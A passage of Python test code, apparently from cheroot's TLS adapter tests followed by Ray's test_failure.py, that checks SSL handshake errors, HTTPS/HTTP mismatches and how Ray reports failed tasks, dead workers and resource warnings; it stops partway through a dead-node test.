if IS_MACOS and IS_PYPY and adapter_type == 'pyopenssl':
expected_substrings = ('tlsv1 alert unknown ca', )
if (
tls_verify_mode in (
ssl.CERT_REQUIRED,
ssl.CERT_OPTIONAL,
)
and not is_trusted_cert
and tls_client_identity == 'localhost'
):
expected_substrings += (
'bad handshake: '
"SysCallError(10054, 'WSAECONNRESET')",
"('Connection aborted.', "
'OSError("(10054, \'WSAECONNRESET\')"))',
"('Connection aborted.', "
'OSError("(10054, \'WSAECONNRESET\')",))',
"('Connection aborted.', "
'error("(10054, \'WSAECONNRESET\')",))',
) if IS_WINDOWS else (
"('Connection aborted.', "
'OSError("(104, \'ECONNRESET\')"))',
"('Connection aborted.', "
'OSError("(104, \'ECONNRESET\')",))',
"('Connection aborted.', "
'error("(104, \'ECONNRESET\')",))',
) if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_LINUX
) else ()
assert any(e in err_text for e in expected_substrings)
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
('tls_verify_mode', 'use_client_cert'),
(
(ssl.CERT_NONE, False),
(ssl.CERT_NONE, True),
(ssl.CERT_OPTIONAL, False),
(ssl.CERT_OPTIONAL, True),
(ssl.CERT_REQUIRED, True),
),
)
def test_ssl_env(
mocker,
tls_http_server, adapter_type,
ca, tls_verify_mode, tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
use_client_cert,
):
"""Test the SSL environment generated by the SSL adapters."""
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
with mocker.mock_module.patch(
'idna.core.ulabel',
return_value=ntob('127.0.0.1'),
):
client_cert = ca.issue_cert(ntou('127.0.0.1'),)
with client_cert.private_key_and_cert_chain_pem.tempfile() as cl_pem:
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_adapter.context.set_verify(
_stdlib_to_openssl_verify[tls_verify_mode],
lambda conn, cert, errno, depth, preverify_ok: preverify_ok,
)
else:
tls_adapter.context.verify_mode = tls_verify_mode
ca.configure_trust(tls_adapter.context)
tls_certificate.configure_cert(tls_adapter.context)
tlswsgiserver = tls_http_server((interface, port), tls_adapter)
interface, _host, port = _get_conn_data(tlswsgiserver.bind_addr)
resp = requests.get(
'https://' + interface + ':' + str(port) + '/env',
verify=tls_ca_certificate_pem_path,
cert=cl_pem if use_client_cert else None,
)
if PY34 and resp.status_code != 200:
pytest.xfail(
'Python 3.4 has problems with verifying client certs',
)
env = json.loads(resp.content.decode('utf-8'))
# hard coded env
assert env['wsgi.url_scheme'] == 'https'
assert env['HTTPS'] == 'on'
# ensure these are present
for key in {'SSL_VERSION_INTERFACE', 'SSL_VERSION_LIBRARY'}:
assert key in env
# pyOpenSSL generates the env before the handshake completes
if adapter_type == 'pyopenssl':
return
for key in {'SSL_PROTOCOL', 'SSL_CIPHER'}:
assert key in env
# client certificate env
if tls_verify_mode == ssl.CERT_NONE or not use_client_cert:
assert env['SSL_CLIENT_VERIFY'] == 'NONE'
else:
assert env['SSL_CLIENT_VERIFY'] == 'SUCCESS'
with open(cl_pem, 'rt') as f:
assert env['SSL_CLIENT_CERT'] in f.read()
for key in {
'SSL_CLIENT_M_VERSION', 'SSL_CLIENT_M_SERIAL',
'SSL_CLIENT_I_DN', 'SSL_CLIENT_S_DN',
}:
assert key in env
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
),
)
def test_https_over_http_error(http_server, ip_addr):
"""Ensure that connecting over HTTPS to HTTP port is handled."""
httpserver = http_server.send((ip_addr, EPHEMERAL_PORT))
interface, _host, port = _get_conn_data(httpserver.bind_addr)
with pytest.raises(ssl.SSLError) as ssl_err:
six.moves.http_client.HTTPSConnection(
'{interface}:{port}'.format(
interface=interface,
port=port,
),
).request('GET', '/')
expected_substring = (
'wrong version number' if IS_ABOVE_OPENSSL10
else 'unknown protocol'
)
assert expected_substring in ssl_err.value.args[-1]
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
pytest.param(ANY_INTERFACE_IPV6, marks=missing_ipv6),
),
)
def test_http_over_https_error(
tls_http_server, adapter_type,
ca, ip_addr,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
):
"""Ensure that connecting over HTTP to HTTPS port is handled."""
# disable some flaky tests
# https://github.com/cherrypy/cheroot/issues/225
issue_225 = (
IS_MACOS
and adapter_type == 'builtin'
)
if issue_225:
pytest.xfail('Test fails in Travis-CI')
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path, tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_certificate.configure_cert(tls_adapter.context)
interface, _host, port = _get_conn_data(ip_addr)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
interface, host, port = _get_conn_data(
tlshttpserver.bind_addr,
)
fqdn = interface
if ip_addr is ANY_INTERFACE_IPV6:
fqdn = '[{}]'.format(fqdn)
expect_fallback_response_over_plain_http = (
(adapter_type == 'pyopenssl'
and (IS_ABOVE_OPENSSL10 or not six.PY2))
or PY27
) or (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and not IS_WIN2016
)
if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and IS_WIN2016
and adapter_type == 'builtin'
and ip_addr is ANY_INTERFACE_IPV6
):
expect_fallback_response_over_plain_http = True
if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and not IS_WIN2016
and adapter_type == 'builtin'
and ip_addr is not ANY_INTERFACE_IPV6
):
expect_fallback_response_over_plain_http = False
if expect_fallback_response_over_plain_http:
resp = requests.get(
'http://{host!s}:{port!s}/'.format(host=fqdn, port=port),
)
assert resp.status_code == 400
assert resp.text == (
'The client sent a plain HTTP request, '
'but this server only speaks HTTPS on this port.'
)
return
with pytest.raises(requests.exceptions.ConnectionError) as ssl_err:
requests.get( # FIXME: make stdlib ssl behave like PyOpenSSL
'http://{host!s}:{port!s}/'.format(host=fqdn, port=port),
)
if IS_LINUX:
expected_error_code, expected_error_text = (
104, 'Connection reset by peer',
)
if IS_MACOS:
expected_error_code, expected_error_text = (
54, 'Connection reset by peer',
)
if IS_WINDOWS:
expected_error_code, expected_error_text = (
10054,
'An existing connection was forcibly closed by the remote host',
)
underlying_error = ssl_err.value.args[0].args[-1]
err_text = str(underlying_error)
assert underlying_error.errno == expected_error_code, (
'The underlying error is {!r}'.
format(underlying_error)
)
assert expected_error_text in err_text
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
new_scheduler_enabled,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
